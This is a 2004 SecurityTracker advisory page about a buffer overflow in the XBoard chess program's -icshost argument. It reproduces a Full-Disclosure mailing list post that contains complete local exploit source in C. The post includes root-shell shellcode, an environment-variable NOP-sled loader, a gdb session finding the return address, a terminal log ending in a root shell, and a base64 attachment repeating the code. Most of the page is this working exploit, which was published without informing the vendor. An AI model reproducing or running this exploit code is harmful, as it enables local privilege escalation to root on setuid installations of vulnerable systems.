Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
XBoard '-icshome' Buffer Overflow Lets Local Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1009277 |
|
SecurityTracker URL: http://securitytracker.com/id/1009277
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 2 2004
|
Impact:
Execution of arbitrary code via local system, User access via local system
|
Exploit Included: Yes
|
Version(s): 4.2.7 and prior versions
|
Description:
A buffer overflow vulnerability was reported in XBoard. A local user may be able to execute arbitrary code to gain elevated privileges, depending on the configuration.
It is reported that a local user can supply a specially crafted 'hostname' value with the '-ics' and '-icshost' parameters to trigger a buffer overflow and execute arbitrary code.
If XBoard is installed with set user id (setuid) or set group id (setgid), a local user can gain elevated privileges.
Some demonstration exploit code is provided in the Source Message.
|
Impact:
A local user can execute arbitrary code with the privileges of XBoard.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.tim-mann.org/xboard.html (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 02 Mar 2004 07:18:03 +0800
Subject: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish
|
This is a multi-part message in MIME format...
------------=_1078183083-17586-0
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
/**
** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY !
*
* C0d3r: N4rK07IX narkotix@linuxmail.org
* Applicati0n : XBoard !stable! Game 0f Chess- For Unix systemZ <= 4.2.7 (All versions)
* Date : BUG was discovered in 29.02.2004 @ 00:15 exploited in 29.02.2004 @ 00:25
* Th3 Bug : when u w4nn4 play with other users on_line ,u must type "-ics" and "-icshost" arguments
* together(man xboard) .The BUG is in the strcpy() , which the user type the "hostname" after the -icshost
argument more than the buffer can h4ndle. Bug is discovered by me.
* Vendor : http://www.tim-mann.org/xboard.html , also the author of thiz chess g4me.
* Vendor informed? : N3v3r !
* Patch : I hope Tim will upgrade thiz game to the 4.2.8 (more practice on buffering)
* Risk : D0 n0t afraid there is n0 risk , if xboard is SUID, may some hurt.
* Tested 0n : Slackware Linux 9.0/9.1 , Mandrake Linux 9.x, Redhat 8.0, with xboard 3.6.2 and 4.2.x (all versions)
narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "A"x456'`
xboard: Could not connect to host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, port 5000: No such file or directory
Segmentation fault
from there on overwriting The EIP is too easy , just tried a few times..
narkotix@labs:~/c-hell$
narkotix@labs:~/c-hell$ ./xboard_env <----- putting sh3llc0de to th3 environment ... i'll give it.
narkotix@labs:~/c-hell$ gdb /usr/X11R6/bin/xboard
...
.......
(gdb) x/s
0xbffffcb6: "XBOARD=", '\220' <repeats 195 times>...
(gdb) x/s
0xbffffd7e: '\220' <repeats 200 times>... <-----------Thiz iz the address of our env w3 n33d.
(gdb) x/s
ok lets convert it to char string.. ------> \x7e\xfd\xff\bf yeah all done.
quit
narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "\x7e\xfd\xff\xbf"x166'`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users) <-----on my box all of the programs r SUID :P just demonstrated.
sh-2.05b#
Gr33tingz: EFnet,mathmonkey,laplace_ex,blackhat community,deathmann,Islam Nation,kusev(civil engineer)
Sh0utZ: collusion,xmlguy,0xbf(fuck u bitch),and u bigmutant r u still alive ? passed your CCNP exam?
L4stW0rdZ: mathmonkey sirada bekleyen daha bir suru vuln program var, ama bir an once projeyi bitirecegimize soz veriyorum.
bu arada SunOS CD lerimi bir an once ISO larsan ben de sevinirim :P. Mucx seni seviyorum bunu Unutma...
U r as Intellig3nt as your f4th3r was :P ..love from I.T.U
**/
//Here is th3 h4x0r version of xboard_env.c Use thiz to set the env, and U do not need
//extra code for exploitation.GDB rulezz.
/****************************************CUT HERE*******************
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // shellcode by zillion
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
char xboard[600];
printf("XBOARD environment loader\n");
printf("=> narkotix@linuxmail.org\n");
memset(xboard,0x90,600);
memcpy(&xboard[600-strlen(shellcode)],shellcode,strlen(shellcode));
memcpy(xboard,"XBOARD=",7);
putenv(xboard);
execl("/bin/bash","bash",'\0');
return(0);
}
********************************************CUT HERE*******/
//Hey scriptkiddiez d0 U think i forget U ?. 0fcoure N0t.But before using this C0de U must set the DISPLAY,and also sysadmin
//must xhost + 'ed localhost . otherwise u will get some errorz like " Error: Can't open display: ".. njoy your life.
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 448 // <----- Play with it,depending on your box. Tested on Slackware 9.0
static char hell_code[] =
//* setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
/* setgid(0); */
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
main(void)
{
printf("************************************************\n");
printf("xboard <= 4.2.7 local xploit written by N4rK07IX\n");
printf("=> narkotix@linuxmail.org\n");
char *env[2] = {hell_code,NULL};
char buffer[BUFFERSIZE];
int i;
int *adrpointer = (int *)(buffer );
int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/X11R6/bin/xboard");
for (i = 0; i < BUFFERSIZE-1 ; i += 4)
*adrpointer++ = ret_addr;
execle("/usr/X11R6/bin/xboard", "xboard","-ics","-icshost",NULL,buffer,env);
if(!execle)
perror("execle()");
return(0);
}
//S3curity Is not Th3 D3f4ult
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
------------=_1078183083-17586-0
Content-Type: application/octet-stream; name="xboard.c"
Content-Disposition: attachment; filename="xboard.c"
Content-Transfer-Encoding: base64
LyoqCioqICAgICAgICAhIFhCb2FyZCA0LjIuNyBVTlBVQkxJU0hFRCBWVUxO
RVJBQkxJVFkgLCAwaERBWSAhCioKKiBDMGQzcjogIE40ckswN0lYICAgICBu
YXJrb3RpeEBsaW51eG1haWwub3JnCiogQXBwbGljYXRpMG4gOiAgWEJvYXJk
ICFzdGFibGUhIEdhbWUgMGYgQ2hlc3MtIEZvciBVbml4IHN5c3RlbVogPD0g
NC4yLjcgKEFsbCB2ZXJzaW9ucykKKiBEYXRlIDogICAgQlVHIHdhcyBkaXNj
b3ZlcmVkIGluIDI5LjAyLjIwMDQgIEAgMDA6MTUgIGV4cGxvaXRlZCBpbiAy
OS4wMi4yMDA0ICBAIDAwOjI1CiogVGgzIEJ1ZyA6IHdoZW4gdSB3NG5uNCBw
bGF5IHdpdGggb3RoZXIgdXNlcnMgb25fbGluZSAsdSBtdXN0IHR5cGUgIi1p
Y3MiIGFuZCAiLWljc2hvc3QiIGFyZ3VtZW50cyAKKiAgICAgICAgICAgdG9n
ZXRoZXIobWFuIHhib2FyZCkgLlRoZSBCVUcgaXMgaW4gdGhlIHN0cmNweSgp
ICwgd2hpY2ggdGhlIHVzZXIgdHlwZSB0aGUgImhvc3RuYW1lIiBhZnRlciB0
aGUgLWljc2hvc3QgCiAgICAgICAgICAgIGFyZ3VtZW50IG1vcmUgdGhhbiB0
aGUgYnVmZmVyIGNhbiBoNG5kbGUuIEJ1ZyBpcyBkaXNjb3ZlcmVkIGJ5IG1l
LgoqIFZlbmRvciA6ICBodHRwOi8vd3d3LnRpbS1tYW5uLm9yZy94Ym9hcmQu
aHRtbCAgLCBhbHNvIHRoZSBhdXRob3Igb2YgdGhpeiBjaGVzcyBnNG1lLgoq
IFZlbmRvciBpbmZvcm1lZD8gOiBOM3YzciAhCiogUGF0Y2ggOiBJIGhvcGUg
VGltIHdpbGwgdXBncmFkZSB0aGl6IGdhbWUgdG8gdGhlIDQuMi44IChtb3Jl
IHByYWN0aWNlIG9uIGJ1ZmZlcmluZykKKiBSaXNrIDogRDAgbjB0IGFmcmFp
ZCB0aGVyZSBpcyBuMCByaXNrICwgaWYgeGJvYXJkIGlzIFNVSUQsIG1heSBz
b21lIGh1cnQuCiogVGVzdGVkIDBuIDogU2xhY2t3YXJlIExpbnV4IDkuMC85
LjEgLCBNYW5kcmFrZSBMaW51eCA5LngsIFJlZGhhdCA4LjAsIHdpdGggeGJv
YXJkIDMuNi4yIGFuZCA0LjIueCAoYWxsIHZlcnNpb25zKQoKbmFya290aXhA
bGFiczp+L2MtaGVsbCQgL3Vzci9YMTFSNi9iaW4veGJvYXJkIC1pY3MgLWlj
c2hvc3QgYHBlcmwgLWUgJ3ByaW50ICJBIng0NTYnYAp4Ym9hcmQ6IENvdWxk
IG5vdCBjb25uZWN0IHRvIGhvc3QgQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQpBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQSwgcG9ydCA1MDAwOiBO
byBzdWNoIGZpbGUgb3IgZGlyZWN0b3J5ClNlZ21lbnRhdGlvbiBmYXVsdApm
cm9tIHRoZXJlIG9uIG92ZXJ3cml0aW5nIFRoZSBFSVAgaXMgdG9vIGVhc3kg
LCBqdXN0IHRyaWVkIGEgZmV3IHRpbWVzLi4KbmFya290aXhAbGFiczp+L2Mt
aGVsbCQKbmFya290aXhAbGFiczp+L2MtaGVsbCQgLi94Ym9hcmRfZW52ICA8
LS0tLS0gcHV0dGluZyBzaDNsbGMwZGUgdG8gdGgzIGVudmlyb25tZW50IC4u
LiBpJ2xsIGdpdmUgaXQuCm5hcmtvdGl4QGxhYnM6fi9jLWhlbGwkIGdkYiAv
dXNyL1gxMVI2L2Jpbi94Ym9hcmQgCi4uLgouLi4uLi4uCihnZGIpIHgvcwow
eGJmZmZmY2I2OiAgICAgICJYQk9BUkQ9IiwgJ1wyMjAnIDxyZXBlYXRzIDE5
NSB0aW1lcz4uLi4KKGdkYikgeC9zCjB4YmZmZmZkN2U6ICAgICAgJ1wyMjAn
IDxyZXBlYXRzIDIwMCB0aW1lcz4uLi4gICAgPC0tLS0tLS0tLS0tVGhpeiBp
eiB0aGUgYWRkcmVzcyBvZiBvdXIgZW52IHczIG4zM2QuCihnZGIpIHgvcwpv
ayBsZXRzIGNvbnZlcnQgaXQgdG8gY2hhciBzdHJpbmcuLiAtLS0tLS0+IFx4
N2VceGZkXHhmZlxiZiAgICB5ZWFoIGFsbCBkb25lLgpxdWl0Cm5hcmtvdGl4
QGxhYnM6fi9jLWhlbGwkICAvdXNyL1gxMVI2L2Jpbi94Ym9hcmQgLWljcyAt
aWNzaG9zdCBgcGVybCAtZSAncHJpbnQgIlx4N2VceGZkXHhmZlx4YmYieDE2
NidgCnNoLTIuMDViIyBpZAp1aWQ9MChyb290KSBnaWQ9MTAwKHVzZXJzKSBn
cm91cHM9MTAwKHVzZXJzKSAgICAgICAgIDwtLS0tLW9uIG15IGJveCBhbGwg
b2YgdGhlIHByb2dyYW1zIHIgU1VJRCA6UCBqdXN0IGRlbW9uc3RyYXRlZC4K
c2gtMi4wNWIjIApHcjMzdGluZ3o6IEVGbmV0LG1hdGhtb25rZXksbGFwbGFj
ZV9leCxibGFja2hhdCBjb21tdW5pdHksZGVhdGhtYW5uLElzbGFtIE5hdGlv
bixrdXNldihjaXZpbCBlbmdpbmVlcikKU2gwdXRaOiAgICBjb2xsdXNpb24s
eG1sZ3V5LDB4YmYoZnVjayB1IGJpdGNoKSxhbmQgdSBiaWdtdXRhbnQgciB1
IHN0aWxsIGFsaXZlID8gcGFzc2VkIHlvdXIgQ0NOUCBleGFtPwpMNHN0VzBy
ZFo6IG1hdGhtb25rZXkgc2lyYWRhIGJla2xleWVuIGRhaGEgYmlyIHN1cnUg
dnVsbiBwcm9ncmFtIHZhciwgYW1hIGJpciBhbiBvbmNlIHByb2pleWkgYml0
aXJlY2VnaW1pemUgc296IHZlcml5b3J1bS4KICAgICAgICAgICBidSBhcmFk
YSBTdW5PUyBDRCBsZXJpbWkgYmlyIGFuIG9uY2UgSVNPIGxhcnNhbiBiZW4g
ZGUgc2V2aW5pcmltIDpQLiBNdWN4IHNlbmkgc2V2aXlvcnVtIGJ1bnUgVW51
dG1hLi4uCgkgICBVIHIgYXMgSW50ZWxsaWczbnQgYXMgeW91ciBmNHRoM3Ig
d2FzIDpQIC4ubG92ZSBmcm9tIEkuVC5VCioqLwoKIC8vSGVyZSBpcyB0aDMg
aDR4MHIgdmVyc2lvbiBvZiB4Ym9hcmRfZW52LmMgVXNlIHRoaXogdG8gc2V0
IHRoZSBlbnYsIGFuZCBVIGRvIG5vdCBuZWVkIAogLy9leHRyYSBjb2RlIGZv
ciBleHBsb2l0YXRpb24uR0RCIHJ1bGV6ei4KIC8qKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqQ1VUIEhFUkUqKioqKioqKioqKioq
KioqKioqCgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5o
PgoKY2hhciBzaGVsbGNvZGVbXSA9CiAgICAgICAgIlx4MzFceGMwXHgzMVx4
ZGJceGIwXHgxN1x4Y2RceDgwIiAvLyBzaGVsbGNvZGUgYnkgemlsbGlvbgog
ICAgICAgICJceGViXHg1YVx4NWVceDMxXHhjMFx4ODhceDQ2XHgwN1x4MzFc
eGMwXHgzMVx4ZGJceGIwXHgyN1x4Y2QiCiAgICAgICAgIlx4ODBceDg1XHhj
MFx4NzhceDMyXHgzMVx4YzBceDMxXHhkYlx4NjZceGI4XHgxMFx4MDFceGNk
XHg4MCIKICAgICAgICAiXHg4NVx4YzBceDc1XHgwZlx4MzFceGMwXHgzMVx4
ZGJceDUwXHg4ZFx4NWVceDA1XHg1M1x4NTZceGIwIgogICAgICAgICJceDNi
XHg1MFx4Y2RceDgwXHgzMVx4YzBceDhkXHgxZVx4ODlceDVlXHgwOFx4ODlc
eDQ2XHgwY1x4NTAiCiAgICAgICAgIlx4OGRceDRlXHgwOFx4NTFceDU2XHhi
MFx4M2JceDUwXHhjZFx4ODBceDMxXHhjMFx4OGRceDFlXHg4OSIKICAgICAg
ICAiXHg1ZVx4MDhceDg5XHg0Nlx4MGNceGIwXHgwYlx4ODlceGYzXHg4ZFx4
NGVceDA4XHg4ZFx4NTZceDBjIgogICAgICAgICJceGNkXHg4MFx4ZThceGEx
XHhmZlx4ZmZceGZmXHgyZlx4NjJceDY5XHg2ZVx4MmZceDczXHg2OCI7Cgpp
bnQgbWFpbigpCnsKICBjaGFyIHhib2FyZFs2MDBdOwogIHByaW50ZigiWEJP
QVJEIGVudmlyb25tZW50IGxvYWRlclxuIik7CiAgcHJpbnRmKCI9PiBuYXJr
b3RpeEBsaW51eG1haWwub3JnXG4iKTsKCiAgbWVtc2V0KHhib2FyZCwweDkw
LDYwMCk7CiAgbWVtY3B5KCZ4Ym9hcmRbNjAwLXN0cmxlbihzaGVsbGNvZGUp
XSxzaGVsbGNvZGUsc3RybGVuKHNoZWxsY29kZSkpOwogIG1lbWNweSh4Ym9h
cmQsIlhCT0FSRD0iLDcpOwogIHB1dGVudih4Ym9hcmQpOwogIAogIGV4ZWNs
KCIvYmluL2Jhc2giLCJiYXNoIiwnXDAnKTsKICAKcmV0dXJuKDApOyAKfSAK
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipD
VVQgSEVSRSoqKioqKiovCi8vSGV5IHNjcmlwdGtpZGRpZXogZDAgVSB0aGlu
ayBpIGZvcmdldCBVID8uIDBmY291cmUgTjB0LkJ1dCBiZWZvcmUgdXNpbmcg
dGhpcyBDMGRlIFUgbXVzdCBzZXQgdGhlIERJU1BMQVksYW5kIGFsc28gc3lz
YWRtaW4KLy9tdXN0IHhob3N0ICsgJ2VkIGxvY2FsaG9zdCAuIG90aGVyd2lz
ZSB1IHdpbGwgZ2V0IHNvbWUgZXJyb3J6IGxpa2UgIiBFcnJvcjogQ2FuJ3Qg
b3BlbiBkaXNwbGF5OiAiLi4gICBuam95IHlvdXIgbGlmZS4KI2luY2x1ZGUg
PHN0ZGlvLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0
ZC5oPgoKI2RlZmluZSBCVUZGRVJTSVpFIDQ0OCAgIC8vIDwtLS0tLSBQbGF5
IHdpdGggaXQsZGVwZW5kaW5nIG9uIHlvdXIgYm94LiBUZXN0ZWQgb24gU2xh
Y2t3YXJlIDkuMAoKc3RhdGljIGNoYXIgaGVsbF9jb2RlW10gPQoKICAgICAg
ICAvLyogc2V0cmV1aWQoMCwwKTsKICAgICAgICAiXHgzMVx4YzAiICAgICAg
ICAgICAgICAgICAgICAgIC8vIHhvciAgICAlZWF4LCVlYXgKICAgICAgICAi
XHgzMVx4ZGIiICAgICAgICAgICAgICAgICAgICAgIC8vIHhvciAgICAlZWJ4
LCVlYngKICAgICAgICAiXHgzMVx4YzkiICAgICAgICAgICAgICAgICAgICAg
IC8vIHhvciAgICAlZWN4LCVlY3gKICAgICAgICAiXHhiMFx4NDYiICAgICAg
ICAgICAgICAgICAgICAgIC8vIG1vdiAgICAkMHg0NiwlYWwKICAgICAgICAi
XHhjZFx4ODAiICAgICAgICAgICAgICAgICAgICAgIC8vIGludCAgICAkMHg4
MAoKICAgICAgICAvKiBzZXRnaWQoMCk7ICovCiAgICAgICAgIlx4MzFceGRi
IiAgICAgICAgICAgICAgICAgICAgICAvLyB4b3IgJWVieCwlZWJ4CiAgICAg
ICAgIlx4ODlceGQ4IiAgICAgICAgICAgICAgICAgICAgICAvLyBtb3YgJWVi
eCwlZWF4CiAgICAgICAgIlx4YjBceDJlIiAgICAgICAgICAgICAgICAgICAg
ICAvLyBtb3YgJDB4MmUsJWFsCiAgICAgICAgIlx4Y2RceDgwIiAgICAgICAg
ICAgICAgICAgICAgICAvLyBpbnQgJDB4ODAKCiAgICAgICAgLy8gZXhlY3Zl
IC9iaW4vc2gKICAgICAgICAiXHgzMVx4YzAiICAgICAgICAgICAgICAgICAg
ICAgIC8vIHhvciAgICAlZWF4LCVlYXgKICAgICAgICAiXHg1MCIgICAgICAg
ICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggICAlZWF4CiAgICAgICAgIlx4
NjhceDJmXHgyZlx4NzNceDY4IiAgICAgICAgICAvLyBwdXNoICAgJDB4Njg3
MzJmMmYKICAgICAgICAiXHg2OFx4MmZceDYyXHg2OVx4NmUiICAgICAgICAg
IC8vIHB1c2ggICAkMHg2ZTY5NjIyZgogICAgICAgICJceDg5XHhlMyIgICAg
ICAgICAgICAgICAgICAgICAgLy8gbW92ICAgICVlc3AsJWVieAogICAgICAg
ICJceDhkXHg1NFx4MjRceDA4IiAgICAgICAgICAgICAgLy8gbGVhICAgIDB4
OCglZXNwLDEpLCVlZHgKICAgICAgICAiXHg1MCIgICAgICAgICAgICAgICAg
ICAgICAgICAgIC8vIHB1c2ggICAlZWF4CiAgICAgICAgIlx4NTMiICAgICAg
ICAgICAgICAgICAgICAgICAgICAvLyBwdXNoICAgJWVieAogICAgICAgICJc
eDhkXHgwY1x4MjQiICAgICAgICAgICAgICAgICAgLy8gbGVhICAgICglZXNw
LDEpLCVlY3gKICAgICAgICAiXHhiMFx4MGIiICAgICAgICAgICAgICAgICAg
ICAgIC8vIG1vdiAgICAkMHhiLCVhbAogICAgICAgICJceGNkXHg4MCIgICAg
ICAgICAgICAgICAgICAgICAgLy8gaW50ICAgICQweDgwCgogICAgICAgIC8v
IGV4aXQoKTsKICAgICAgICAiXHgzMVx4YzAiICAgICAgICAgICAgICAgICAg
ICAgIC8vIHhvciAgICAlZWF4LCVlYXgKICAgICAgICAiXHhiMFx4MDEiICAg
ICAgICAgICAgICAgICAgICAgIC8vIG1vdiAgICAkMHgxLCVhbAogICAgICAg
ICJceGNkXHg4MCI7ICAgICAgICAgICAgICAgICAgICAgLy8gaW50ICAgICQw
eDgwCgoKbWFpbih2b2lkKQogICAgCnsKICAgICAgICBwcmludGYoIioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxu
Iik7ICAgICAgICAgICAgCiAgICAgICAgcHJpbnRmKCJ4Ym9hcmQgPD0gNC4y
LjcgbG9jYWwgeHBsb2l0IHdyaXR0ZW4gYnkgTjRySzA3SVhcbiIpOwogICAg
ICAgIHByaW50ZigiPT4gbmFya290aXhAbGludXhtYWlsLm9yZ1xuIik7CiAg
ICAgICAgY2hhciAqZW52WzJdID0ge2hlbGxfY29kZSxOVUxMfTsKICAgICAg
ICBjaGFyIGJ1ZmZlcltCVUZGRVJTSVpFXTsKICAgICAgICBpbnQgaTsKICAg
ICAgICBpbnQgKmFkcnBvaW50ZXIgPSAoaW50ICopKGJ1ZmZlciApOwoJCiAg
ICAgICAgaW50IHJldF9hZGRyID0gMHhiZmZmZmZmYSAtIHN0cmxlbihoZWxs
X2NvZGUpIC0gc3RybGVuKCIvdXNyL1gxMVI2L2Jpbi94Ym9hcmQiKTsKCQog
ICAgICAgIGZvciAoaSA9IDA7IGkgPCBCVUZGRVJTSVpFLTEgOyBpICs9IDQp
CgkKICAgICAgICAgICAgICAgICphZHJwb2ludGVyKysgPSByZXRfYWRkcjsK
CiAgICAgICAgZXhlY2xlKCIvdXNyL1gxMVI2L2Jpbi94Ym9hcmQiLCAieGJv
YXJkIiwiLWljcyIsIi1pY3Nob3N0IixOVUxMLGJ1ZmZlcixlbnYpOwogICAg
ICAgIGlmKCFleGVjbGUpCiAgICAgICAgcGVycm9yKCJleGVjbGUoKSIpOwog
ICAgICAgIHJldHVybigwKTsKfQoKLy9TM2N1cml0eSBJcyBub3QgVGgzIEQz
ZjR1bHQKCg==
------------=_1078183083-17586-0--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
